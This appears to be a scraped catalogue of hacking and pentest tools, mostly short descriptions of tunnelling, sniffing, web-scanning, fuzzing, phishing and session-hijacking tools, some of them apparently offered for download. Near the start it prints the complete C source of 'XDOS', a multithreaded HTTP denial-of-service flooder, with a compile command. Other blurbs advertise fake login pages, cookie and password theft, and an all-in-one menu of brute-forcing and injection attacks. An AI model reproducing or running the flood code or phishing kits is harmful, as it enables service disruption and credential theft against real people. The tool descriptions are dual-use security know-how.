Not only does Proxocket let you sniff the traffic to and from an application without having to load a new network driver or raw socket sniffing application, it also makes it possible to sniff traffic going to localhost. But why would someone wanna establish a network connection to localhost, you might ask. I have personally used localhost sockets in my applications when I have code running in different processes or threads and need an effective way for them to exchange data in an asynchronous manner (NetworkMiner does not use localhost sockets for inter-process communication though). I’m actually pretty sure many software developers use localhost sockets when they need to provide data exchange between different processes.
Localhost connections are also used when running Stunnel or TOR proxies on your local machine, which encrypt all outgoing traffic. You can thereby use Proxocket in order to capture the network traffic BEFORE it is encrypted by Stunnel or TOR.


pwnat, pronounced « poe-nat », is a tool that allows any
number of clients behind NATs to communicate with a
server behind a separate NAT with *no* port forwarding
and *no* DMZ setup on any routers in order to directly
communicate with each other. The server does not need
to know anything about the clients trying to connect.

Simply put, this is a proxy server that works behind a NAT,
even when the client is behind a NAT, without any 3rd party.

There is no middle man, no proxy, no 3rd party,
no UPnP/STUN/ICE required, no spoofing, and no DNS tricks.

More importantly, the client can then connect to any
host or port on any remote host or to a fixed host and
port decided by the server.


rdp2tcp is a tunneling tool on top of remote desktop protocol (RDP). It uses RDP virtual channel capabilities to multiplex several ports forwarding over an already established rdesktop session.

Available features:

* tcp port forwarding
* reverse tcp port forwarding
* process stdin/out forwarding
* SOCKS5 minimal support

The code is splitted into 2 parts:

* the client running on the rdesktop client side
* the server running on the Terminal Server side

Once both rdp2tcp client and server are running, tunnels management is performed by the controller (on client side). The controller typically listen on localhost (port 8477) waiting for new tunnel registrations.


Tcpjunk is a general TCP protocols testing and hacking utility.
Main features:¶

* Supports IPv4/IPv6
* Automatically send/receive data according to predefined session setup
* Client/Server mode
* Supports SSL
* Dynamic data insertion and manipulation using tags
* Traffic generation
* GUI mode


Tunnels TCP over UDP packets. Runs in user space on Linux, Solaris, Cygwin (with IPv6 extension), and native Win32. Currently there isn’t any authentication or encryption


A Simple HTTP DoS Tool!


$#define WIN32_LEAN_AND_MEAN

$unsigned long thread = 0;

$static int connect_tv(struct sockaddr_in *addr, int timeout);
$static DWORD WINAPI dosmain(LPVOID p);
$const int main(int argc, char *argv[])
$ if(argc != 4) {
$ puts(« \t\t\t\tXDOS – by Bull Moose\n »);
$ printf(« Usage: %s [IP] [Port] [Threads]\n »,argv[0]);
$ return 1;
$ }
$ puts(« Initiating xdos…\n »);
$ struct sockaddr_in saddr;
$ unsigned long tid;
$ int i;
$ memset(&saddr,  », sizeof(saddr));
$ saddr.sin_family = AF_INET;
$ saddr.sin_addr.s_addr = inet_addr(argv[1]);
$ saddr.sin_port = (short)htons(atoi(argv[2]));
$ for(i = 1; i <= atoi(argv[3]); i++) CreateThread(0,0,dosmain,(LPVOID)&saddr,0,&tid);
$ puts(« Attack sequence engaged!\n »);
$ dosmain(&saddr);
$ return 0;
$static int connect_tv(struct sockaddr_in *addr, int timeout)
$ int s;
$ unsigned long i;
$ fd_set wr_fds, err_fds;
$ struct timeval tv;
$ if (s == 0 || s == INVALID_SOCKET) return 0;
$ tv.tv_sec = timeout / 1000;
$ tv.tv_usec = 0;
$ i = 1;
$ ioctlsocket(s, FIONBIO, &i);
$ for (;;) {
$ i = connect(s, (struct sockaddr *)addr, sizeof(struct sockaddr_in));
$ if (i != SOCKET_ERROR)
$ goto exit_connected;
$ i = WSAGetLastError();
$ if (i == WSAENOBUFS) {
$ Sleep(50);
$ continue;
$ }
$ break;
$ goto exit_err;
$ }
$ FD_ZERO(&wr_fds);
$ FD_SET(s, &wr_fds);
$ FD_ZERO(&err_fds);
$ FD_SET(s, &err_fds);
$ i = select(s+1, NULL, &wr_fds, &err_fds, &tv);
$ if (i == 0 || i == -1)
$ goto exit_err;
$ if (FD_ISSET(s, &err_fds) || !FD_ISSET(s, &wr_fds))
$ goto exit_err;
$ i = 0;
$ ioctlsocket(s, FIONBIO, &i);
$ return s;
$ closesocket(s);
$ return 0;
$static DWORD WINAPI dosmain(LPVOID p)
$ extern unsigned long thread;
$ thread++;
$ printf(« Thread number %u initiated!\n »,thread);
$ struct sockaddr_in addr;
$ char Buffer[] = \
$ « GET / HTTP/1.1\r\n »
$ « Host:\r\n\r\n »;
$ SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_BELOW_NORMAL);
$ int sock;
$ if (p == NULL) goto ex;
$ addr = *(struct sockaddr_in *)p;
$ for (;;) {
$ sock = connect_tv(&addr, 8);
$ if (sock != 0) {
$ send(sock,Buffer,strlen(Buffer),0);
$ Sleep(300);
$ closesocket(sock);
$ } else if(sock==SOCKET_ERROR) {
$ puts(« Error: Socket Error.\n »);
$ ExitProcess(1);
$ }
$ }
$ex: ExitThread(0);
$ return 0;

$remove all $ befire compile

@gcc -s -O xdos.c -o xdos.exe -lws2_32





1> Getproxy
2> Testproxylist
3> Testproxy
4> Autoproxy
5> Jumping
6> Loadproxy
7> removing
9> ip getting
10> smtp address grabbing
11> tracing the rough
12> identifying technology of server (header information)
13> full server header info gathering
14> crawling emails from search engines (capability to track tricky emails too)
15> website crawling (fussing links of same directory)
16> login page finder (support for asp,aspx,php,cfm,jsp,html,htm with no of payloads)
17> sub domain enumeration
18>host name qualification from ip range
19> web server service analysis
20> website structure fingerprinting
21> who is look up
22> reversing
23> enumerates server users
24> daemon foot printing
25> operating system foot printing
26> SSLcheck (by this task you can test ssl cipher)
27> DBcheck (by this task you can test database)
28> web server monitoring
29> getting port information +service info (using thread so very fast)
30> sql injection scan
30.1-> auto scanning url
30.2->auto creating exploitable url
30.3->auto cheacking version
30.4-> auto fuzing table
31> blind injection scan
32>lfi scan
33> rfi scan
34> rce scan
35> xss scan (support HTTPS also)
36> cgi scan (more vuln paths)
37> cms scan (support joomla, membo etc…)
38> custom scan
39> full scan
40> bruiting ftp (first will check for anonymous login)
41> bruiting smtp
42> bruiting imap
43> bruiting nntp
44> bruiting pop3
45> bruting RDP
46> Bruting rdp from ip range
47> Hashid
48> Onlinehash
49> Autohash
50> Md5
51> Sha1
52> Sha256
53> Sha384
54> Sha512
55> Base64enc
56> Base64dec
57> wordlist builder using custom combination
58> extracting ip addresses from files
59> extracting emails from files
60> crawling words from any of the web which is given by you
61> wget utility
62> getting port information +service info (using thread so very fast)
63> sql injection scan
63.1-> auto scanning url
63.2->auto creating exploitable url
63.3->auto cheacking version
63.4-> auto fuzing table
64> blind injection scan
65> lfi scan
66> rfi scan
67> rce scan
68> xss scan (support HTTPS also)
69> cgi scan (more vuln paths)
70> cms scan (support joomla, membo etc…)
71> custom scan
72> full scan
73> getting port information +service info (using thread so very fast)
74> sql injection scan
74.1-> auto scanning url
74.2->auto creating exploitable url
74.3->auto cheacking version
74.4-> auto fuzing table
75> blind injection scan
76>lfi scan
77> rfi scan
78> rce scan
79> xss scan (support HTTPS also)
80> cgi scan (more vuln paths)
81> cms scan (support joomla, membo etc…)
82> custom scan
83> full scan
84> maleware analysis
85> trojan analysis (very stupid task)
86> exe to batch
87> Fileanalysis
88> Iptrace
89> Penmysql
90> Penpostgray
91> Penmssql
92> Penoracle
93> Penaccess
94> Expsearch
95> Milexpgrab
96> Pacexpgrab
97> Mad
98> Boa
99> Buletftp
100> Cesarftp
101> Efs
102> Dorkscan
103> Subscan
104> Gvscan
105> Shellscan
106> Ranker
107> Usergrab
108> Dorkcreator
109> Cmsscan
110> Bandtest
111> Flooding
112> Honeypot
113> Chat
114> Games
115> Ids
116> Automachine

Social Engineering


Imposter is a flexible framework to perform Browser Phishing attacks. Once the system running Imposter is configured as the DNS server to the victims, the internal DNS server of Imposter resolves all DNS queries to itself.

When the victim tries to access any website the domain resolves to the system running Imposter and Imposter’s internal web server serves content to the victim. Depending on the configuration appropriate payloads are sent to the victim. Data stolen from the victim is sent back to Imposter and this is stored in a SQLite database in a folder created with its name based on the date and time of the attack.

The lists of attacks performed are:

* Steal cookies
* Set cookies
* Steal Local Shared Objects
* Steal stored passwords from FireFox
* Steal cached files
* Poison browser cache
* Steal files from the victim’s local file system through Internet Explorer
* Run SQL queries on the victim’s Google Gears database and transfer the results
* Create ResourceStore and Managed ResourceStore on the victim’s Google Gears LocalServer

General Requirements:

* Administrative Rights:


o Imposter listens on ports 53/UDP and 80/TCP
o The ’File Stealer’ module runs an internal sniffer

* System running Imposter should have the IP address


o Internal DNS server resolves all domains to

* WinPcap must be installed on the system

S-E Ninja

S-E Ninja is a Social Engineering tool, with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP.

Available Sites:

* (hotmail)
* (AR,EN Langs)
* (AR,EN Langs)


* Fakepages.
* IP, malicious page gives you the ip address of victim.
* Mailer.

You can send an anonymous message using PHP mail() Function /[SENINJA]/admin/mail and you can get your victim ip put it in the database »/[SENINJA]/ip/ »

Download from

Social Engineering Toolkit

“The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.”



UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. Written in C/C++, and available on Linux and Windows, the software is free and available for anyone to download, under the GPLv3 license. Some useful features of UCSniff that have been combined together into a single package:


VideoJak is an IP Video security assessment tool that can simulate a proof of concept video interception or replay test against a targeted, user-selected video session. VideoJak is the first of its kind security tool that analyzes video codec standards such as H.264. VideoJak works by first capturing the RTP port used in a video conversation or stream. Next, VideoJak analyzes the RTP packets, collecting the RTP sequence numbers and timestamp values used between the video endpoints. Then VideoJak creates a custom video payload by changing the sequence numbers and timestamp values used in the original RTP packets between the two video endpoints. After the user selects a targeted video device to attack in an ongoing video session, VideoJak delivers the payload over the learned RTP port against the target. This attack results in one of several new features:



Andiparos is a fork of the famous Paros Proxy. It is an open source web application security assessment tool that gives penetration testers the ability to spider websites, analyze content, intercept and modify requests, etc.

The advantage of Andiparos is mainly the support of Client Certificates on Smartcards. Moreover it has several small interface enhancements, making the life easier for penetration testers…


{Arachni} is a feature-full and modular Ruby framework that allows penetration testers and administrators to evaluate the security of web applications.

{Arachni} is smart, it trains itself with every HTTP response it receives during the audit process.
Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling
through each path of a web application’s cyclomatic complexity.
This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.

Features of Arachni:

* Provide a stable and efficient framework
* Be simple
* Cookie-jar support
* SSL support.
* User Agent spoofing.
* Proxy support for SOCKS and HTTP(S).
* SOCKS support is kindly provided by socksify.
* Proxy authentication.
* Site authentication.
* Local DNS cache limits name resolution queries.
* Custom output lib.
* The system uses its own print wrappers to output messages.
* Highlighted command line output, Metasploit style.
* Run mods last option.
* Allows to run the modules after site analysis has concluded.
* UI abstraction.
* Only {Arachni::UI::CLI} for the time being but WebUI & GUI are relatively easy to implement now.
* Traps Ctrl-C interrupt.
* Interrupts pause the system, the user then has the option to either resume or exit.

The Website Crawler included with Arachni has the following features:
The crawler is provided by Anemone with some slight modifications to accommodate extra features.

* Filters for redundant pages like galleries, catalogs, etc based on regular expressions and counters.
* URL exclusion filter based on regular expressions.
* URL inclusion filter based on regular expressions.
* Stays in domain by default and it’ll probably stay that way.
* Can optionally follow subdomains.
* Multi-threaded with adjustable thread count.
* Adjustable depth limit.
* Adjustable link count limit.
* Adjustable redirect limit.

The HTML Analyzer provided by Arachni provides the following functions:

Can extract and analyze:

* Forms
* Links
* Cookies


The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

BodgeIt Store

The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.

Some of its features and characteristics:

* Easy to install – just requires java and a servlet engine, e.g. Tomcat
* Self contained (no additional dependencies other than to 2 in the above line)
* Easy to change on the fly – all the functionality is implemented in JSPs, so no IDE required
* Cross platform
* Open source
* No separate db to install and configure – it uses an ‘in memory’ db that is automatically (re)initialized on start up

All you need to do is download and open the zip file, and then extract the war file into the webapps directory of your favorite servlet engine.

Then point your browser at (for example) http://localhost:8080/bodgeit

You may find it easier to find vulnerabilities using a pen test tool.

If you dont have a favourite one, I’d recommend the Zed Attack Proxy (for which I’m the project lead).

The Bodge It Store include the following significant vulnerabilities:

* Cross Site Scripting
* SQL injection
* Hidden (but unprotected) content
* Cross Site Request Forgery
* Debug code
* Insecure Object References
* Application logic vulnerabilities

Browser Fuzzer

Browser Fuzzer 3 is designed as a hybrid framework/standalone fuzzer; the modules it uses are extendable but also highly integrated into the core. bf3 can be used via command line to set all necessary flags for each fuzzing operation. After initialization, bf3 creates test cases in a numbered system. Fuzzing is automated through the browser using the refresh method. If error is detected, server logs can provide insight to the offending test case.


– Fuzzes CSS, DOM, HTML, JavaScript and XML
– Attended and Unattended Fuzzing Modes
– 7th Generation Fuzzing Oracle
– Random Data Generator
– Mutation Fuzzing Engine

Browser Rider

BrowserRider is a framework built to exploit the cross site scripting vulnerability. Its purpose is to prove the impact of this vulnerability during a vulnerability assessment.

Burp Suite

Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Key features unique to Burp Suite include:

* Detailed analysis and rendering of requests and responses.
* One-click transfer of interesting requests between tools.
* Site map showing information accumulated about target applications in tree and table form.
* Ability to « passively » spider an application in a non-intrusive manner, with all requests originating from the user’s browser.
* Suite-level target scope configuration, driving numerous individual tool actions.
* Fully fledged web vulnerability scanner. [Pro version only]
* Ability to save and restore state. [Pro version only]
* FIPS-compliant statistical analysis of session token randomness.
* Utilities for decoding and comparing application data.
* A range of engagement tools, to make your work faster and more effective. [Pro version only]
* Suite-wide search function. [Pro version only]
* Support for custom client and server SSL certificates.
* Extensibility via the IBurpExtender interface.
* Centrally configured settings for upstream proxies, web and proxy authentication, and logging.
* Tools can run in a single tabbed window, or be detached in individual windows.
* Runs in both Linux and Windows.


CAT is designed to facilitate manual web application penetration testing for more complex, demanding application testing tasks. It removes some of the more repetitive elements of the testing process, allowing the tester to focus on individual applications, thus enabling them to conduct a much more thorough test. Conceptually it is similar to other proxies available both commercially and open source, but CAT provides a richer feature set and greater performance, combined with a more intuitive user interface.

There are a number of differences between CAT and currently available web proxies. They include:

CAT uses Internet Explorer’s rendering engine for accurate HTML representation
It supports many different types of text conversions including: URL, Base64, Hex, Unicode, HTML/XML, SQL and JavaScript no quotes
It offers integrated SQL Injection and XSS Detection
Synchronised Proxies for Authentication and Authorisation checking
Faster performance due to HTTP connection caching
SSL Version and Cipher checker using OpenSSL
Greater flexibility for importing/exporting logs and saving projects
Tabbed Interface allows for multiple tools at once e.g. multiple repeaters & different logs
The ability to repeat and modify a sequence of requests (particularly useful in SSO testing)
It’s free!


CeWL (Custom Word List generator) is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL is pronounced « cool ».


Clickjacking Tool

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.

This new browser-based tool allows a user to experiment with clickjacking techniques by using point-and-click to visually select different elements within a webpage to be targeted. The tool also allows several ‘next-generation’ clickjacking techniques to be used, as introduced in Paul Stone’s Blackhat Europe 2010 talk.

Among the features of the new tool are:

* Use point-and-click to select the areas of a page to be targeted
* Supports the new ‘text-field injection’ technique
* Supports the new ‘content extraction’ technique
* ‘Visible mode’ replay allowing a user to see how the technique works behind the science
* ‘Hidden mode’ replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.

The tool is currently in an early beta stage, and works best in Firefox 3.6. Full support for other browsers will follow shortly. For further information, please see the Readme.txt file in the downloadable tool.

Darkjumper Developed by : mywisdom & gunslinger_

This tool will try to find every website that host at the same server at your target Then check for every vulnerability of each website that host at the same server

Functions of darkjumper:
1. User enumeration guessing based on 4-8 chars trial taken from every site name that host at the same server.
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site at the same server.
3. CGI and Path Scanning.
4. Port-scanning
5. Auto-bruteforcing after user enumeration
6. Auto-injector – auto column finder (mysql) if found mysql bug found
7. Proxy added
8. Verbocity added
9. IP or proxy checker and GeoIP useful for checking your IP or your proxy work or not.


A simple perl tool which detects several Directory Traversal Vulnerabilities on HTTP/FTP Servers. This AttackDB version currently has: 871 traversal payloads (and counting!).

* Detects Directory traversal vulnerabilities on remote HTTP/FTP server systems.
* Currently, the traversal database holds 881 attack payloads. Use the -update flag to perform an online fresh update.
* DotDotPwn checks the presence of boot.ini on the vulnerable systems through Directory traversal vulnerabilities, so it’s assumed that the tested systems are
Windows based HTTP/FTP servers.


Firefox extension that demonstrates HTTP session hijacking attacks

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a « cookie » which is used by your browser for all subsequent requests.
It’s extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called « sidejacking ») is when an attacker gets a hold of a user’s cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They’ve been ignoring this responsibility for too long, and it’s time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.


Groundspeed is an open-source Firefox extension for web application security testers presented at the OWASP AppSec DC 2009. It allows you to manipulate the web application’s user interface to eliminate annoying limitations and client-side controls that interfere with the web application penetration test.


Hamster is a tool for HTTP session hijacking with passive sniffing. It does so, by sniffing on a network, capturing the session cookies, importing them into the browser to allow you to hijack their session! HTTP session hijacking or SideJacking is where you hijack a existing Web session with a remote service by intercepting and using the credentials (normally session cookies) that identified the user to that specific server.


JBroFuzz is a web application fuzzer for requests being made over HTTP and/or HTTPS. Its purpose is to provide a single, portable application that offers stable web protocol fuzzing capabilities.

Release Notes (2.3):
Multiple instances can now save data in different launch directories, under: Preferences -> Directory Locations
Keep History of previous dir in: File -> Save, File -> Open, File -> Save As
Fixed find functionality when viewing fuzzing responses (thx Markus!)
Added a swap button, in the Encoder Window, plus friends
Encoder/Hash is now also a standalone jar/exe file
Added right click encode/decode functionality in the Fuzzer tab – Request Text Panel
Added a standalone jbrofuzz-core-2.3.jar fuzzing API library

Release Notes (2.1):

– Ctrl + M to load your own fuzzers from a .jbrf file
– Removed the default addition of line feeds at the end of each request, make sure you know what you are fuzzing!
– On The Wire: Right-click, clear & also option to select to see requests and/or responses
– Added ASCII 85 (045-A85-RFC) & printable ASCII 94 (046-A94-CHR) fuzzers.
– Base32 and zBase32 Encode/Decode functionality added
– JBroFuzz now logs into daily log (thnx Ranulf!)
– You can load your custom payloads by placing a file called fuzzers.jbrf within your working directory.
– Added 3 new file extension fuzzers (thnx Adam)

The components of JBroFuzz are all integrated into a single window and can be accessed through individual tabs. These tabs are:


* The fuzzing tab is the main tab of JBroFuzz, responsible for all fuzzing operations performed over the network. Depending on the fuzzer payloads selected, it creates the malformed data for each request, puts it on the wire and writes the response to a file.


* The graphing tab is responsible for graphing (in a variety of forms) the responses received while fuzzing. This tab can offer a clear indication of a response that is different then the rest received, an indication of further examination being required.


* The payloads tab is a collection of fuzzers with their corresponding payloads that can be used while fuzzing. Payloads are added to the request in the fuzzing tab; a more clear view of what payloads are available, how they are grouped and what properties each fuzzer has can be seen in this tab.


* The headers tab is a collection of browser headers that can be used while fuzzing. Headers are obtained from different browsers on different platforms and operating systems. This tab is provided, as many web applications respond differently to different browser impersonation attacks.


* The system tab represents the logging console of JBroFuzz at runtime. Here you can access java runtime information, see any errors that might occur and also track operation in terms of events being logged.


This script is used to take the highest beneficts of the local file include vulnerability in a webserver

A new simple tool was released recently which focuses purely on LFI attacks.


* Automatically find the root of the file system
* Detect default files outside of the web folder
* Attempts to detect passwords inside the files
* Supports basic authentication
* Can use null byte to bypass some controls
* Writes a report of the scan to a file


Mantra is a dream that came true. It is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software. Mantra is a security framework which can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.

Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.


Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.

Netsparker’s unique detection and exploitation techniques allows it to be dead accurate in reporting hence it’s the first and the only False Positive Free web application security scanner

R U Dead Yet

R-U-Dead-Yet, or R.U.D.Y for short, implements the generic HTTP DoS attack via long form field submissions. The attack’s theory is described in the following paper:

This tool runs with an interactive console menu, automatically detecting forms within given URL, and allowing the user to choose which forms and form fields are desirable to use for the POST attack. In addition, the tool offers unattended execution by providing the necessary parameters within a configuration file.


Sahi is an automation tool to test web applications. Sahi injects javascript into web pages using a proxy and the javascript helps automate web applications.

Sahi is a tester friendly tool. It abstracts out most difficulties that testers face while automating web applications. Some salient features include excellent recorder, platform and browser independence, no XPaths, no waits, multi-threaded playback, excellent Java interaction and inbuilt reporting.


* Browser and Operating System independent
* Powerful recorder which works across browsers
* Powerful Object Spy
* Intuitive and simple APIs
* Javascript based scripts for good programming control
* Version Controllable text-based scripts
* In-built reports
* In-built multi-threaded or parallel playback of tests
* Tests do not need the browser window to be in focus
* Command line and ant support for integration into build processes
* Supports external proxy, HTTPS, 401 & NTLM authentications
* Supports browser popups and modal dialogs
* Supports AJAX and highly dynamic web applications
* Scripts very robust
* Works on applications with random auto-generated ids
* Very lightweight and scalable
* Supports data-driven testing. Can connect to database, Excel or CSV file.
* Ability to invoke any Java library from scripts


* Framesets/pages with frames/iframes loading pages from multiple domains is not supported. Sahi cannot handle pages which have other pages from different domains embedded in them using iframes or frames. So you cannot have a page from having an iframe with a page from Note that this is not the same as switching between domains, where you navigate from a page to a page, which will work in Sahi.
* File upload field will not be populated on browsers for javascript verification. File upload itself works fine


Our in-depth understanding of security issues, emerging Web 2.0 technologies such as AJAX, traditional Web technologies, and Web programming languages such as PHP, enabled us to deliver exactly what we set out to provide – the most feature-rich and advanced web application security scanner available to date.

Sandcat combines Syhunt’s state-of-the-art, multi-process scanning technologies with the incredibly fast LUA language to perform remote web application security scans. While spidering a web site and hunting vulnerabilities, Sandcat emulates a modern, HTML 5-aware web browser. Download it and have a look for yourself!


WSFuzzer is a LGPL’d program, written in Python, that currently targets Web Services. In the current version HTTP based SOAP services are the main target. This tool was created based on, and to automate, some real-world manual SOAP pen testing work. This tool is NOT meant to be a replacement for solid manual human analysis. Please view WSFuzzer as a tool to augment analysis performed by competent and knowledgable professionals. Web Services are not trivial in nature so expertise in this area is a must for proper pen testing.


WackoPicko is a vulnerable web application used to test web application vulnerability scanners. — Read more


Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won’t damage production systems, it’s completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more


WebCruiser – Web Vulnerability Scanner, a compact but powerful web security scanning tool that will aid you in auditing your site! It has a Vulnerability Scanner and a series of security tools.

It can support scanning website as well as POC( Prooving of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, a XPath injection tool, and a Cross Site Scripting tool!

* Crawler(Site Directories And Files);
* Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.);
* POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;
* GET/Post/Cookie Injection;
* SQL Server: PlainText/Union/Blind Injection;
* MySQL/DB2/Access: Union/Blind Injection;
* Oracle: Union/Blind/CrossSite Injection;
* Post Data Resend;
* Administration Entrance Search;
* Time Delay For Search Injection;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.

WebScarab NG
WebScarab-NG is a complete rewrite of the old WebScarab application, with a special focus on making the application more user-friendly.

WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.


Websecurify Security Testing Framework identifies web security vulnerabilities by using advanced browser automation, discovery and fuzzing technologies. The framework is written in JavaScript and successfully executes in numerous platforms including modern browsers with support for HTML5, xulrunner, xpcshell, Java, V8 and others.

“Websecurify is a web and web2.0 security initiative specializing in researching security issues and building the next generation of tools to defeat and protect web technologies.”

This version contains the following improvements:

* Users interface improvements
* Faster, more stable testing platform
* Improved extension development API
* Less false-positives
* Significant testing performance gains
* Automatic taking of vulnerability screenshots
* Integration with the Websecurify Network
* Improved fuzzing strategies
* Workspace perspectives
* Integrated application and extension automatic updates


XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.


XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.

When used against a website, XSSploit first crawls the whole website and identifies encountered forms. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics.

The vulnerabilities that have been discovered can then be exploited using the exploit generation engine of XSSploit. This extensible functionality allows choosing the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.

XSSploit comes with several files :

– The main file. Contains the XSSploit core and the command line interface.
– The GUI interface.
– extensions.txt: XSSploit’s spider crawls web pages using REGEXPs. This file contains the file extensions on the server that should be spidered. To add a new extension, simply add a new line in this file and write your extension. Don’t forget the dot.
– exploits.xml: The exploits database. Please refer to this file to create new exploits.
– report.xsl: This stylesheet is a very basic example on how to display the report generated by XSSploit. Put this file in the same folder as the XML report and point your browser to the report file to see the report.


Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.


DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

DAVTest supports:

* Automatically send exploit files
* Automatic randomization of directory to help hide files
* Send text files and try MOVE to executable name
* Basic and Digest authorization
* Automatic clean-up of uploaded files
* Send an arbitrary file


Fiddler is a Web Debugging Proxy which logs all HTTP(S) traffic between your computer and the Internet. Fiddler allows you to inspect all HTTP(S) traffic, set breakpoints, and « fiddle » with incoming or outgoing data. Fiddler includes a powerful event-based scripting subsystem, and can be extended using any .NET language.

Fiddler is freeware and can debug traffic from virtually any application, including Internet Explorer, Mozilla Firefox, Opera, and thousands more.


fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable.

The goal of fimap is to improve the quality and security of your website.


fuzzdb is a comprehensive set of known attack pattern sequences, predictable locations, and error messages for intelligent brute force testing and exploit condition identification of web applications.

Many mechanisms of attack used to exploit different web server platforms and applications are triggered by particular meta-characters that are observed in more than one product security advisory. fuzzdb is a database attack patterns known to have caused exploit conditions in the past, categorized by attack type, platform, and application.

Because of the popularity of a small number of server types, platforms, and package formats, resources such as logfiles and administrative directories are typically located in a small number of predictable locations. A comprehensive database of these, sorted by platform type, makes brute force fuzz testing a scalpel-like approach.

Since system errors contain predictable strings, fuzzdb contains lists of error messages to be pattern matched against server output in order to aid detection software security defects.

Primary sources used for attack pattern research:

* researching old web exploits for repeatable attack strings
* scraping scanner patterns from http logs
* various books, articles, blog posts, mailing list threads
* patterns gleaned from other open source fuzzers and pentest tools
* analysis of default app installs
* system and application documentation
* error messages

It’s like a non-automated scanner without the scanner.


If you like to fuzz-force your way into finding vulnerabilities, chances are that you will like iExploder. It is inspired from mangleme another similar tool to find security and reliability problems in web browsers.

It feeds the browser under consideration with bad HTML and CSS code, so as to test its stability and security. It continuously feeds browsers bad data in the hope that they will eventually crash. It has been designed to run for hours, or even days until the browser crashes. iExploder is available as a full-featured browser harness, standalone webserver or CGI script.

A few of its features are:

* Tests all HTML and CSS attributes that Mozilla, Webkit and other browsers support
* Basic fuzzing for media formats (bmp, gif, ico, jng, jpg, ogg, png, snd, svg, tiff, wav, xbm, xpm)
* Very basic DOM manipulation fuzzing via JS
* HTTP header fuzzing
* CSS Selector fuzzing
* Logic, buffer overflow, and format string testing
* An unlimited amount of repeatable tests
* Sequential and random testcase testing, with the ability to resume (sequential only)
